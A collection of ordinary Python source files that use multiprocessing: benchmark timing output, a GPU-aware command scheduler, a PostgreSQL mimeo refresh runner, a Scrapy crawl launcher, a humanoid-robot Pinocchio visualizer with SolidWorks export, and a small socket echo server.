"""
resp_time:0.08155584335327148
resp_time:0.08160281181335449
resp_time:0.0867300033569336
"""
# 200 gunicorn + flask
"""
resp_time:0.850884199142456
resp_time:0.8485920429229736
resp_time:0.8648147583007812
resp_time:0.8581891059875488
resp_time:0.9136908054351807
"""
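
# --- Illustrative variant (sketch, not part of the benchmark) ---
# The module-level session above is copied into each Pool worker at fork time,
# so connections are not shared between processes. A common pattern is to give
# every worker its own session via a Pool initializer:
#
#   _session = None
#
#   def _init_session():
#       global _session
#       _session = requests.session()
#
#   p = Pool(200, initializer=_init_session)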
run_it.py
# -*- coding: utf-8 -*-
# @Time    : 2021/3/6
# @Author  : Lart Pang
# @GitHub  : https://github.com/lartpang
import argparse
import subprocess
import time
from enum import Enum
from multiprocessing import Process

import pynvml

pynvml.nvmlInit()


# SOME CONSTANT
class STATUS(Enum):
    NORMAL = 0
    CMD_INVALID = 1
    GPU_BUSY = 2


class MyProcess:
    slot_idx = -1
    curr_task_id = 0

    def __init__(
        self, interpreter_path, gpu_id, verbose=True, stdin=None, stdout=None, stderr=None, num_cmds=None, max_used_ratio=0.5
    ):
        super().__init__()
        self.gpu_id = gpu_id
        self.interpreter_path = interpreter_path
        self.verbose = verbose
        self.num_cmds = num_cmds

        self.stdin = stdin
        self.stdout = stdout
        self.stderr = stderr
        self.sub_proc = None
        self.proc = None

        self.gpu_handler = pynvml.nvmlDeviceGetHandleByIndex(gpu_id)
        self.max_used_ratio = max_used_ratio

        MyProcess.slot_idx += 1

    def __str__(self):
        return f"[ID {self.slot_idx} INFO] NEW PROCESS SLOT ON GPU {self.gpu_id} IS CREATED!"

    def _used_ratio(self, used, total):
        return used / total

    def get_used_mem(self, return_ratio=False):
        meminfo = pynvml.nvmlDeviceGetMemoryInfo(self.gpu_handler)
        if return_ratio:
            return self._used_ratio(meminfo.used, meminfo.total)
        return meminfo.used

    def _create_sub_proc(self, cmd=""):
        self.sub_proc = subprocess.Popen(
            args=f"CUDA_VISIBLE_DEVICES={self.gpu_id} {self.interpreter_path} -u {cmd}",
            stdin=self.stdin,
            stdout=self.stdout,
            stderr=self.stderr,
            shell=True,
            executable="bash",
            env=None,
            close_fds=True,
            bufsize=1,
            text=True,
            encoding="utf-8",
        )
        print(f"[NEW TASK PID: {self.sub_proc.pid}] {self.sub_proc.args}")
        if self.verbose:
            if self.stdout is not None and self.sub_proc is not None:
                for l in self.sub_proc.stdout:
                    print(f"[ID: {self.curr_task_id}/{self.num_cmds} GPU: {self.gpu_id}] {l}", end="")

    def create_and_start_proc(self, cmd=None):
        if (used_mem := self.get_used_mem(return_ratio=True)) > self.max_used_ratio:
            # TODO:
            # The current check is not very accurate. A better approach would be for the
            # target program to expose an option for the number of epochs (`--num-epochs`):
            # first run each command with num_epoch=1 and record how much GPU memory it
            # actually uses, then schedule the remaining work based on those measurements.
            # This would probably also require the program to support overwriting its
            # previous output (`--overwrite`).
            self.status = STATUS.GPU_BUSY
            print(
                f"[ID {self.slot_idx} WARN] the memory usage of the GPU {self.gpu_id} is currently {used_mem}, "
                f"which exceeds the maximum threshold {self.max_used_ratio}."
            )
            return

        print(f"[ID {self.slot_idx} INFO] {cmd}")
        MyProcess.curr_task_id += 1

        self.proc = Process(target=self._create_sub_proc, kwargs=dict(cmd=cmd))
        self.proc.start()
        # Only change the status once the process has been created and started successfully.
        self.status = STATUS.NORMAL

    def is_alive(self):
        if self.status == STATUS.NORMAL:
            return self.proc.is_alive()
        return False


def read_cmds_from_txt(path):
    with open(path, encoding="utf-8", mode="r") as f:
        cmds = []
        for line in f:
            line = line.strip()
            if line:
                cmds.append(line)
    return cmds


def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("--interpreter", type=str, required=True, help="The path of your interpreter you want to use.")
    parser.add_argument("--verbose", action="store_true", help="Whether to print the output of the subprocess.")
    parser.add_argument(
        "--gpu-pool", nargs="+", type=int, default=[0], help="The pool containing all ids of your gpu devices."
    )
    parser.add_argument("--max-workers", type=int, help="The max number of the workers.")
    parser.add_argument(
        "--cmd-pool",
        type=str,
        required=True,
        help="The text file containing all your commands. It will be combined with `interpreter`.",
    )
    parser.add_argument("--max-used-ratio", type=float, default=0.5, help="The max used ratio of the gpu.")
    args = parser.parse_args()

    if args.max_workers is None:
        args.max_workers = len(args.gpu_pool)
    return args


def main():
    args = get_args()
    print("[YOUR CONFIG]\n" + str(args))

    cmd_pool = read_cmds_from_txt(path=args.cmd_pool)
    print("[YOUR CMDS]\n" + "\n".join(cmd_pool))

    num_gpus = len(args.gpu_pool)

    print("[CREATE PROCESS OBJECTS]")
    proc_slots = []
    for i in range(min(args.max_workers, len(cmd_pool))):  # make sure the number of slots is <= the number of commands
        gpu_id = i % num_gpus
        proc = MyProcess(
            interpreter_path=args.interpreter,
            gpu_id=args.gpu_pool[gpu_id],
            verbose=args.verbose,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            num_cmds=len(cmd_pool),
            max_used_ratio=args.max_used_ratio,
        )
        print(proc)
        proc_slots.append(proc)

    for p in proc_slots:
        if len(cmd_pool) == 0:  # make sure popping never fails
            break
        cmd = cmd_pool.pop()  # pop a command off the stack
        p.create_and_start_proc(cmd=cmd)
        if p.status == STATUS.GPU_BUSY:  # this GPU is short on memory right now, skip it for the moment
            cmd_pool.append(cmd)  # the command did not run, push it back
            continue

    is_normal_ending = True
    while proc_slots:  # the pool of the processes is not empty
        for slot_idx, p in enumerate(proc_slots):  # polling
            if not p.is_alive():
                if len(cmd_pool) == 0:  # all commands are running or have already been executed
                    del proc_slots[slot_idx]
                    print("[NO MORE COMMANDS, DELETE THE PROCESS SLOT!]")
                    break

                cmd = cmd_pool.pop()
                p.create_and_start_proc(cmd=cmd)
                if p.status == STATUS.GPU_BUSY:  # this GPU is short on memory right now, skip it for the moment
                    cmd_pool.append(cmd)  # the command did not run, push it back
                    continue

        if proc_slots and all([_p.status == STATUS.GPU_BUSY for _p in proc_slots]):
            # All GPUs are occupied by external programs, so exit directly: whenever our
            # own jobs are running normally, the slot status is NORMAL.
            print("[ALL GPUS ARE BUSY, EXIT THE LOOP!]")
            proc_slots.clear()
            is_normal_ending = False
            break
        time.sleep(1)

    if is_normal_ending:
        print("[ALL COMMANDS HAVE BEEN COMPLETED!]")


if __name__ == "__main__":
    main()
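
# --- Illustrative usage (hypothetical paths and file contents) ---
#   $ cat cmds.txt
#   train.py --model resnet
#   train.py --model vgg
#   $ python run_it.py --interpreter /usr/bin/python3 --cmd-pool cmds.txt \
#         --gpu-pool 0 1 --max-workers 2 --max-used-ratio 0.5 --verbose
# Each line of cmds.txt is launched as `CUDA_VISIBLE_DEVICES=<gpu> <interpreter> -u <cmd>`.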
run_refresh.py
#!/usr/bin/env python

import argparse, psycopg2, sys
from multiprocessing import Process

mimeo_version = "1.3.0"

parser = argparse.ArgumentParser(description="Script to manage running mimeo table replication with a period set in their configuration. By default, refreshes are run sequentially in ascending order of their last_run value. Parallel refreshes are supported with -j option. If type or batch_limit options are not given, all replication tables of all types scheduled will be run.")
parser.add_argument('-c', '--connection', default="host=", help="""Connection string for use by psycopg to connect to your database. Defaults to "host=" (local socket).""")
parser.add_argument('-t', '--type', choices=["snap", "inserter", "updater", "dml", "logdel", "table"], help="Must be one of the following values: snap, inserter, updater, dml, logdel, table. If you'd like to run more than one type, but not all of them, call this script separately for each type.")
parser.add_argument('-b', '--batch_limit', type=int, default=-1, help="An integer representing how many replication tables you want to run for this call of the script. Default is all of them that are scheduled to run.")
parser.add_argument('-j', '--jobs', type=int, default=0, help="Allows parallel running of replication jobs. Set this equal to the number of processors you want to use to allow that many jobs to start simultaneously. (this uses multiprocessing library, not threading)")
parser.add_argument('-v', '--verbose', action="store_true", help="More detailed output.")
parser.add_argument('--version', action="store_true", help="Print out the minimum version of mimeo this script is meant to work with. The version of mimeo installed may be greater than this.")
args = parser.parse_args()


def create_conn():
    conn = psycopg2.connect(args.connection)
    conn.autocommit = True
    return conn


def close_conn(conn):
    conn.close()


def get_mimeo_schema(conn):
    cur = conn.cursor()
    sql = "SELECT nspname FROM pg_catalog.pg_namespace n, pg_catalog.pg_extension e WHERE e.extname = 'mimeo' AND e.extnamespace = n.oid"
    cur.execute(sql)
    mimeo_schema = cur.fetchone()[0]
    cur.close()
    return mimeo_schema


def get_jobs(conn, mimeo_schema):
    # Fetch all jobs scheduled to run
    cur = conn.cursor()
    sql = "SELECT dest_table, type FROM " + mimeo_schema + ".refresh_config"
    if args.type != None:
        sql += "_" + args.type
    sql += " WHERE period IS NOT NULL AND (CURRENT_TIMESTAMP - last_run)::interval > period ORDER BY last_run ASC"
    if args.batch_limit > -1:
        sql += " LIMIT " + str(args.batch_limit)
    cur.execute(sql)
    result = cur.fetchall()
    cur.close()
    return result


def print_version():
    print(mimeo_version)
    sys.exit()


def single_process(result, mimeo_schema):
    conn = create_conn()
    cur = conn.cursor()
    for i in result:
        if args.verbose:
            print("Running " + i[1] + " replication for table: " + i[0])
        sql = "SELECT " + mimeo_schema + ".refresh_" + i[1] + "(%s)"
        cur.execute(sql, [i[0]])
    cur.close()
    close_conn(conn)


def refreshProc(dest_table, rtype, mimeo_schema):
    conn = create_conn()
    cur = conn.cursor()
    sql = "SELECT " + mimeo_schema + ".refresh_" + rtype + "(%s)"
    cur.execute(sql, [dest_table])
    cur.close()
    close_conn(conn)


if __name__ == "__main__":
    if args.version:
        print_version()

    conn = create_conn()
    mimeo_schema = get_mimeo_schema(conn)
    result = get_jobs(conn, mimeo_schema)
    close_conn(conn)

    if args.jobs > 0:
        while len(result) > 0:
            if args.verbose:
                print("Jobs left in queue: " + str(len(result)))
            if len(result) < args.jobs:  # shorten the for loop if the number of tables to run is less than -j
                args.jobs = len(result)
            processlist = []
            for num in range(0, args.jobs):
                i = result.pop()
                p = Process(target=refreshProc, args=(i[0], i[1], mimeo_schema))
                p.start()
                if args.verbose:
                    print("Running " + i[1] + " replication for table: " + i[0])
                processlist.append(p)
            for j in processlist:
                j.join()
    else:
        single_process(result, mimeo_schema)
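
# --- Illustrative invocations (hypothetical connection string) ---
#   ./run_refresh.py --version
#   ./run_refresh.py -c "host=localhost dbname=mydb" -t dml -j 4 -v
# The second call runs all scheduled dml refreshes four at a time, each in its
# own process with its own database connection (see refreshProc above).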
main.py
# coding=utf-8
from multiprocessing import Queue, Process

from scrapy.utils.project import get_project_settings
from twisted.internet import reactor
from scrapy.crawler import CrawlerProcess

from shop.spiders.markethot_spider import MarkethotSpider
from shop.spiders.megadrop24_spider import Megadrop24Spider
from shop.spiders.yandex_spider import YandexSpider
from web.manage import runserver


class CrawlRunner:
    def __init__(self, query, history):
        self.query = query
        self.history = history

    def run_spider(self):
        def f(q, spider):
            try:
                runner = CrawlerProcess(get_project_settings())
                deferred = runner.crawl(spider, query=self.query, history=self.history)
                deferred.addBoth(lambda _: reactor.stop())
                reactor.run()
                q.put(None)
            except Exception as e:
                q.put(e)

        for spider in [Megadrop24Spider, MarkethotSpider]:
            q = Queue()
            p = Process(target=f, args=(q, spider))
            p.start()
            result = q.get()
            p.join()

            if result is not None:
                raise result


if __name__ == '__main__':
    runserver()
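
# --- Design note (sketch) ---
# Twisted's reactor cannot be restarted once stopped, so calling reactor.run()
# twice in the same process (one run per spider) would raise
# ReactorNotRestartable. Running each crawl in its own Process, as
# CrawlRunner.run_spider does, gives every spider a fresh reactor and lets
# exceptions travel back to the parent through the Queue:
#
#   CrawlRunner(query="shoes", history=True).run_spider()  # hypothetical args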
visualizer.py
import numpy as np
import pinocchio
from pinocchio.utils import *
from pinocchio.rpy import matrixToRpy, rpyToMatrix, rotate
from robot_properties_solo.config import SoloConfig
from loader import loadRobot
import subprocess
import threading
import time


class VisualModel():
    def __init__(self, display=False):
        self.display = display

        def showGepetto():
            subprocess.call(["gepetto-gui"])

        if self.display:
            try:
                thread = threading.Thread(target=showGepetto)
                thread.start()
                # thread.join()
            except Exception:
                print("Error: unable to start Gepetto-GUI thread")

        self.robot = loadRobot()
        self.model = self.robot.model
        self.data = self.model.createData()
        self.nq = self.model.nq
        self.nv = self.model.nv
        self.na = self.model.nq - 7
        self.dq0 = pinocchio.utils.zero(self.model.nv)
        self.q0 = self.model.referenceConfigurations["kneeling"]

        lSole = 'l_foot'
        rSole = 'r_foot'
        lKneePoint = 'l_knee_lp'
        rKneePoint = 'r_knee_rp'
        lHandPoint = 'l_hand_dp'
        rHandPoint = 'r_hand_dp'
        lToe = 'l_foot_toe'
        rToe = 'r_foot_toe'
        self.lSoleId = self.model.getFrameId(lSole)
        self.rSoleId = self.model.getFrameId(rSole)
        self.lkId = self.model.getFrameId(lKneePoint)
        self.rkId = self.model.getFrameId(rKneePoint)
        self.lhId = self.model.getFrameId(lHandPoint)
        self.rhId = self.model.getFrameId(rHandPoint)
        self.lToeId = self.model.getFrameId(lToe)
        self.rToeId = self.model.getFrameId(rToe)

        # Calibrate origin at center of knee points
        self.calibrateOrigin()

        # # Measure distance
        # lhPos0 = self.data.oMf[self.lhId].translation
        # diffPos0 = lhPos0-lkPos0

        # Manual Tuning (Joint number table)
        # torso:     0, 1, 2, 3, 4, 5, 6
        # left_leg:  7(0) l_hip_y, 8(1) l_hip_r, 9(2), 10(3), 11(4), 12(5)
        # left_arm:  13(6), 14(7), 15(8), 16(9)
        # right_leg: 17(10), 18(11), 19(12), 20(13), 21(14), 22(15)
        # right_arm: 23(16), 24(17), 25(18), 26(19)

        # l1: distance between axis of ankle roll and axis of knee
        # l2: distance between axis of ankle roll and toe
        # l3: distance between axis of knee and knee point
        l1 = 0.144
        l2 = 0.03999
        l3 = 0.014
        kneeOffset = anklePitchOffset = np.arcsin((l2 - l3) / l1)
        SE3 = pinocchio.SE3
        # arm
        self.q0[13] = self.q0[23] = -np.pi / 2
        self.q0[14] = self.q0[24] = 6.0 / 180. * np.pi
        self.q0[15] = -(np.pi / 2 - 15. / 180. * np.pi)
        self.q0[25] = np.pi / 2 - 15. / 180. * np.pi
        # Initialize elbow position using kinematic data from [Abdolshah2018]
        self.q0[16] = self.q0[26] = (np.pi - 163. / 180. * np.pi)
        # leg
        self.q0[9] = self.q0[19] = 0
        self.q0[10] = self.q0[20] = -np.pi / 2 - kneeOffset
        self.q0[11] = self.q0[21] = -anklePitchOffset

        # start_SE3 = SE3(eye(3), np.matrix([0, 0, 0]).T)*SE3(eye(3), np.matrix([0, 0, 0]).T)
        # mid_SE3 = start_SE3*SE3(rotate('y', np.pi/3),zero(3))*SE3(rotate('z', np.pi/2),zero(3))
        # end_SE3 = mid_SE3 * SE3(rotate('z', np.pi/2),zero(3))
        # self.q0[3:7] = se3ToXYZQUAT(mid_SE3)[3:7]

        pinocchio.forwardKinematics(self.model, self.data, self.q0)
        pinocchio.updateFramePlacements(self.model, self.data)
        lkPos0 = self.data.oMf[self.lkId].translation
        ltPos0 = self.data.oMf[self.lToeId].translation

        self.calibrateOrigin()
        lhPos0 = self.data.oMf[self.lhId].translation
        rhPos0 = self.data.oMf[self.rhId].translation
        # print(self.rhId)
        # print(lhPos0, rhPos0)

        self.q0[2] += 0.000001  # increase height for pybullet simulation
        self.x0 = np.concatenate([self.q0, self.dq0])
        self.model.defaultState = np.concatenate([self.q0, np.zeros((self.model.nv, 1))])
        if display:
            self.show()

    def show(self):
        time.sleep(10)
        self.robot.initViewer(loadModel=True)
        self.robot.viewer.gui.addFloor('hpp-gui/floor')
        self.robot.display(self.q0)

    def calibrateOrigin(self):
        pinocchio.forwardKinematics(self.model, self.data, self.q0)
        pinocchio.updateFramePlacements(self.model, self.data)
        lkPos0 = self.data.oMf[self.lkId].translation
        rkPos0 = self.data.oMf[self.rkId].translation
        self.q0[:3] -= (lkPos0 + rkPos0) / 2
        pinocchio.forwardKinematics(self.model, self.data, self.q0)
        pinocchio.updateFramePlacements(self.model, self.data)
        lkPos0 = self.data.oMf[self.lkId].translation
        rkPos0 = self.data.oMf[self.rkId].translation
        originPos0 = (lkPos0 + rkPos0) / 2
        assert abs(originPos0[0]) < 1.e-6, "[Error]Origin is not zeroed in x direction!"
        assert abs(originPos0[1]) < 1.e-6, "[Error]Origin is not zeroed in y direction!"
        assert abs(originPos0[2]) < 1.e-6, "[Error]Origin is not zeroed in z direction!"

    def visualizeConfig(self, q):
        def showGepetto():
            subprocess.call(["gepetto-gui"])

        try:
            thread = threading.Thread(target=showGepetto)
            thread.start()
            # thread.join()
        except Exception:
            print("Error: unable to start Gepetto-GUI thread")
        time.sleep(5)
        self.robot.initViewer(loadModel=True)
        self.robot.viewer.gui.addFloor('hpp-gui/floor')
        size_q = np.shape(q)[0]
        if size_q == self.nq - 7:
            torso_pose = np.array([0, 0, 0.5, 0, 0, 0, 1])
            q = np.hstack((torso_pose, q))
        self.robot.display(q)

    def generateSwData(self, x):
        '''
        This function is used to generate solidworks data type
        '''
        q = np.asarray(x).copy()
        quat = q[3:7].copy()
        # Convert quaternion to rpy
        vector = np.matrix([0, 0, 0, quat[0], quat[1], quat[2], quat[3]]).T
        se3 = pinocchio.XYZQUATToSE3(vector)
        rpy = matrixToRpy(se3.rotation)
        q[3] = rpy[0]
        q[4] = rpy[1]
        q[5] = rpy[2]
        q[6] = 0
        # Process units: for distance, convert m to mm;
        # for angle, convert radian to degree
        # print(q[0:3])
        q[0] += 0.0264
        q[1] += 0.
        q[2] += 0.50958
        for i in range(3):
            q[i] *= 1000.
            q[i] = np.abs(q[i])
        for i in range(3, self.nq):
            q[i] *= 180. / np.pi
            if q[i] < 0:
                q[i] += 360.
        return q

    def saveEquation(self, x, savePath):
        '''
        Legacy function
        This function is used to generate a configuration file for Solidworks via the "equation" interface
        '''
        q = self.generateSwData(x)
        f = open(savePath, "w+")
        for i in range(self.nq):
            f.write('"q%d" = %f\r\n' % (i, q[i]))
        f.write('\n')
        names = []
        names.append('"D1@q0_x"= "q0"\r\n')
        names.append('"D1@q1_y"= "q1"\r\n')
        names.append('"D1@q2_z"= "q2"\r\n')
        names.append('"D1@q3_x"= "q3"\r\n')
        names.append('"D1@q4_y"= "q4"\r\n')
        names.append('"D1@q5_z"= "q5"\r\n')
        names.append('"D1@q7_l_hip_y"= "q7"\r\n')
        names.append('"D1@q8_l_hip_r"= "q8"\r\n')
        names.append('"D1@q9_l_hip_p"= "q9"\r\n')
        names.append('"D1@q10_l_knee"= "q10"\r\n')
        names.append('"D1@q11_l_ankle_p"= "q11"\r\n')
        names.append('"D1@q12_l_ankle_r"= "q12"\r\n')
        names.append('"D1@q13_l_shoulder_p"= "q13"\r\n')
        names.append('"D1@q14_l_shoulder_r"= "q14"\r\n')
        names.append('"D1@q15_l_elbow"= "q15"\r\n')
        names.append('"D1@q16_r_hip_y"= "q16"\r\n')
        names.append('"D1@q17_r_hip_r"= "q17"\r\n')
        names.append('"D1@q18_r_hip_p"= "q18"\r\n')
        names.append('"D1@q19_r_knee"= "q19"\r\n')
        names.append('"D1@q20_r_ankle_p"= "q20"\r\n')
        names.append('"D1@q21_r_ankle_r"= "q21"\r\n')
        names.append('"D1@q22_r_shoulder_p"= "q22"\r\n')
        names.append('"D1@q23_r_shoulder_r"= "q23"\r\n')
        names.append('"D1@q24_r_elbow"= "q24"\r\n')
        for i in range(self.nq - 1):
            f.write(names[i])

    def saveConfig(self, x, savePath):
        '''
        This function is used to generate a configuration file for Solidworks via the "configuration" interface
        '''
        q = self.generateSwData(x)
        import xlsxwriter

        # Create a workbook and add a worksheet.
        workbook = xlsxwriter.Workbook(savePath)
        worksheet = workbook.add_worksheet()
        # Some data we want to write to the worksheet.
        jointName = []
        jointName.append('D1@q0_x')
        jointName.append('D1@q1_y')
        jointName.append('D1@q2_z')
        jointName.append('D1@q3_x')
        jointName.append('D1@q4_y')
        jointName.append('D1@q5_z')
        jointName.append('null')
        jointName.append('D1@q7_l_hip_y')
        jointName.append('D1@q8_l_hip_r')
        jointName.append('D1@q9_l_hip_p')
        jointName.append('D1@q10_l_knee')
        jointName.append('D1@q11_l_ankle_p')
        jointName.append('D1@q12_l_ankle_r')
        jointName.append('D1@q13_l_shoulder_p')
        jointName.append('D1@q14_l_shoulder_r')
        jointName.append('D1@q15_l_shoulder_y')
        jointName.append('D1@q16_l_elbow')
        jointName.append('D1@q17_r_hip_y')
        jointName.append('D1@q18_r_hip_r')
        jointName.append('D1@q19_r_hip_p')
        jointName.append('D1@q20_r_knee')
        jointName.append('D1@q21_r_ankle_p')
        jointName.append('D1@q22_r_ankle_r')
        jointName.append('D1@q23_r_shoulder_p')
        jointName.append('D1@q24_r_shoulder_r')
        jointName.append('D1@q25_r_shoulder_y')
        jointName.append('D1@q26_r_elbow')
        q = q.tolist()
        # Start from the first cell. Rows and columns are zero indexed.
        row = 0
        col = 0
        inverse = set(['D1@q20_r_knee', 'D1@q9_l_hip_p'])
        flip = set(['D1@q10_l_knee', 'D1@q23_r_shoulder_p'])
        turn = set(['D1@q15_l_shoulder_y'])
        # Iterate over the data and write it out row by row.
        for item, value in zip(jointName, q):
            if item in inverse:
                value = 360 - value
            if item in flip:
                value = 180 + value
            if item in turn:
                value = 90 + value
            if item == 'null':
                pass
            else:
                worksheet.write(row, col, item)
                worksheet.write(row + 1, col, value)
            col += 1
        workbook.close()

    def readConfig(self, filePath):
        '''
        This function is used to read a configuration file from Solidworks via the "configuration" interface
        '''
        import xlrd
        wb = xlrd.open_workbook(filePath)
        sheet = wb.sheet_by_index(0)
        joint_values = []
        joint_names = []
        inverse = set(['D1@q20_r_knee', 'D1@q9_l_hip_p'])
        flip = set(['D1@q10_l_knee', 'D1@q23_r_shoulder_p'])
        turn = set(['D1@q15_l_shoulder_y'])
        row = 0
        col = 0
        for i in range(self.nq):
            if i == 6:
                joint_values.append(0)
                joint_names.append('null')
            else:
                name = sheet.cell_value(row, col)
                value = sheet.cell_value(row + 1, col)
                if name in inverse:
                    value = 360 - value
                if name in flip:
                    value = 180 + value
                if name in turn:
                    value = 90 + value
                joint_names.append(name)
                joint_values.append(value)
                col += 1
        for i in range(3, self.nq):
            if joint_values[i] > 180:
                joint_values[i] -= 360
            joint_values[i] *= np.pi / 180.
        for i in range(3):
            joint_values[i] *= 0.001
        joint_values[0] -= 0.0264
        joint_values[1] -= 0.
        joint_values[2] -= 0.50958
        # Convert rpy back to a quaternion
        rpy = np.asarray(joint_values[3:6])
        se3 = pinocchio.SE3.Identity()
        se3.translation = np.asarray(joint_values[0:3])
        se3.rotation = rpyToMatrix(rpy)
        xyzquaternion = pinocchio.SE3ToXYZQUAT(se3).T.tolist()[0]
        joint_values[0:7] = xyzquaternion
        # print(joint_values)
        joint_values = np.asarray(joint_values)
        return joint_values

    def getLimit(self):
        u = []
        l = []
        # l_hip_y
        u.append(np.pi / 2)  # fore to inward
        l.append(-np.pi / 6)  # fore to outward
        # l_hip_r
        u.append(np.pi / 4)  # lift left
        l.append(-np.pi / 4)  # lift right
        # l_hip_p
        u.append(np.pi / 2)  # bend forward
        l.append(-np.pi / 6)  # bend backward
        # l_knee
        u.append(0)  # bend forward impossible
        l.append(-np.pi / 2 - np.pi / 10)  # bend backward
        # l_ankle_p
        u.append(np.pi / 6)  # rear lift
        l.append(-np.pi / 2)  # fore lift
        # l_ankle_r
        u.append(np.pi / 6)  # lift right
        l.append(-np.pi / 6)  # lift left
        # l_shoulder_p
        u.append(np.pi / 2)  # arm backward
        l.append(-np.pi)  # arm forward
        # l_shoulder_r
        u.append(np.pi)  # arm left
        l.append(-np.pi / 18)  # arm right
        # l_shoulder_y
        u.append(np.pi)  # elbow left
        l.append(-np.pi)  # elbow right
        # l_elbow
        u.append(np.pi / 2 + np.pi / 6)  # elbow bend inward
        l.append(0)  # elbow bend outward impossible
        # r_hip_y
        u.append(np.pi / 6)  # fore to outward
        l.append(-np.pi / 2)  # fore to inward
        # r_hip_r
        u.append(np.pi / 4)  # lift left
        l.append(-np.pi / 4)  # lift right
        # r_hip_p
        u.append(np.pi / 2)  # bend forward
        l.append(-np.pi / 6)  # bend backward
        # r_knee
        u.append(0)  # bend forward impossible
        l.append(-np.pi / 2 - np.pi / 10)  # bend backward
        # r_ankle_p
        u.append(np.pi / 6)  # rear lift
        l.append(-np.pi / 2)  # fore lift
        # r_ankle_r
        u.append(np.pi / 6)  # lift right
        l.append(-np.pi / 6)  # lift left
        # r_shoulder_p
        u.append(np.pi / 2)  # arm backward
        l.append(-np.pi)  # arm forward
        # r_shoulder_r
        u.append(np.pi)  # arm right
        l.append(-np.pi / 18)  # arm left
        # r_shoulder_y
        u.append(2 * np.pi)  # elbow left
        l.append(-2 * np.pi)  # elbow right
        # r_elbow
        u.append(np.pi / 2 + np.pi / 6)  # elbow bend inward
        l.append(0)  # elbow bend outward impossible
        return l, u

    def getVelLimit(self):
        velLower = []
        velUpper = []
        mx28 = 5.76
        mx64 = 6.59
        mx106 = 4.71
        velLower.append(-1 * mx64)
        velUpper.append(mx64)
        for i in range(5):
            velLower.append(-1 * mx106)
            velUpper.append(mx106)
        for i in range(2):
            velLower.append(-1 * mx64)
            velUpper.append(mx64)
        for i in range(2):
            velLower.append(-1 * mx28)
            velUpper.append(mx28)
        velLower.append(-1 * mx64)
        velUpper.append(mx64)
        for i in range(5):
            velLower.append(-1 * mx106)
            velUpper.append(mx106)
        for i in range(2):
            velLower.append(-1 * mx64)
            velUpper.append(mx64)
        for i in range(2):
            velLower.append(-1 * mx28)
            velUpper.append(mx28)
        return velLower, velUpper

    def getTorqueLimit(self):
        torqueLower = []
        torqueUpper = []
        torqueLower.append(-6.0)
        torqueUpper.append(6.0)
        for i in range(5):
            torqueLower.append(-8.4)
            torqueUpper.append(8.4)
        for i in range(2):
            torqueLower.append(-6.0)
            torqueUpper.append(6.0)
        for i in range(2):
            torqueLower.append(-2.5)
            torqueUpper.append(2.5)
        torqueLower.append(-6.0)
        torqueUpper.append(6.0)
        for i in range(5):
            torqueLower.append(-8.4)
            torqueUpper.append(8.4)
        for i in range(2):
            torqueLower.append(-6.0)
            torqueUpper.append(6.0)
        for i in range(2):
            torqueLower.append(-2.5)
            torqueUpper.append(2.5)
        return torqueLower, torqueUpper


class ReferenceState():
    def __init__(self, state):
        self.state_names = []
        self.state_names.append('x')
        self.state_names.append('y')
        self.state_names.append('z')
        self.state_names.append('rx')
        self.state_names.append('ry')
        self.state_names.append('rz')
        self.state_names.append('l_hip_y')
        self.state_names.append('l_hip_r')
        self.state_names.append('l_hip_p')
        self.state_names.append('l_knee')
        self.state_names.append('l_ankle_p')
        self.state_names.append('l_ankle_r')
        self.state_names.append('l_shoulder_p')
        self.state_names.append('l_shoulder_r')
        self.state_names.append('l_shoulder_y')
        self.state_names.append('l_elbow')
        self.state_names.append('r_hip_y')
        self.state_names.append('r_hip_r')
        self.state_names.append('r_hip_p')
        self.state_names.append('r_knee')
        self.state_names.append('r_ankle_p')
        self.state_names.append('r_ankle_r')
        self.state_names.append('r_shoulder_p')
        self.state_names.append('r_shoulder_r')
        self.state_names.append('r_shoulder_y')
        self.state_names.append('r_elbow')
        self.state_names.append('v_x')
        self.state_names.append('v_y')
        self.state_names.append('v_z')
        self.state_names.append('v_rx')
        self.state_names.append('v_ry')
        self.state_names.append('v_rz')
        self.state_names.append('v_l_hip_y')
        self.state_names.append('v_l_hip_r')
        self.state_names.append('v_l_hip_p')
        self.state_names.append('v_l_knee')
        self.state_names.append('v_l_ankle_p')
        self.state_names.append('v_l_ankle_r')
        self.state_names.append('v_l_shoulder_p')
        self.state_names.append('v_l_shoulder_r')
        self.state_names.append('v_l_shoulder_y')
        self.state_names.append('v_l_elbow')
        self.state_names.append('v_r_hip_y')
        self.state_names.append('v_r_hip_r')
        self.state_names.append('v_r_hip_p')
        self.state_names.append('v_r_knee')
        self.state_names.append('v_r_ankle_p')
        self.state_names.append('v_r_ankle_r')
        self.state_names.append('v_r_shoulder_p')
        self.state_names.append('v_r_shoulder_r')
        self.state_names.append('v_r_shoulder_y')
        self.state_names.append('v_r_elbow')

        self.reference_state = state.copy()
        self.stateWeights = np.array([0.] * 3 + [0.] * 3 + [0.01] * 6 + [0.01] * 4 + [0.01] * 6 + [0.01] * 4 + [10.] * 26)
        self.config_id = {}
        self.weight_id = {}
        self.value = {}
        for i, (name) in enumerate(self.state_names):
            if i > 5:
                j = i + 1
            else:
                j = i
            self.config_id[name] = j
            self.weight_id[name] = i
            self.value[name] = [np.asscalar(self.reference_state[j]), np.asscalar(self.stateWeights[i])]

    # Note: a `value` property would shadow the plain `self.value` dict
    # assigned in __init__, so it is kept disabled here and the dict is
    # accessed directly instead.
    # @property
    # def value(self):
    #     return self._value

    # @property
    # def weight(self):
    #     return self._weight

    def update(self):
        for name in self.state_names:
            config_id = self.config_id[name]
            weight_id = self.weight_id[name]
            self.reference_state[config_id] = self.value[name][0]
            self.stateWeights[weight_id] = self.value[name][1]


def main():
    VisualModel(display=True)


if __name__ == "__main__":
    main()
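
# --- Worked number for the offset geometry above (sketch) ---
# With l1 = 0.144, l2 = 0.03999, l3 = 0.014:
#   kneeOffset = arcsin((l2 - l3) / l1) = arcsin(0.02599 / 0.144)
#              = arcsin(0.1805) ~= 0.1815 rad ~= 10.4 degrees,
# which is the amount added to the -pi/2 knee angle in VisualModel.__init__.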
multi_echo_server.py
#!/usr/bin/env python3
import socket
import time
from multiprocessing import Process

HOST = ""
PORT = 8001
BUFFER_SIZE = 1024


def main():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind((HOST, PORT))
        s.listen(2)
        while True:
            conn, addr = s.accept()
            p = Process(target=handle_echo, args=(addr, conn))
            p.daemon = True
            p.start()
            print("Started Process ", p)


def handle_echo(addr, conn):
    print("Connected by", addr)
    full_data = conn.recv(BUFFER_SIZE)
    conn.sendall(full_data)
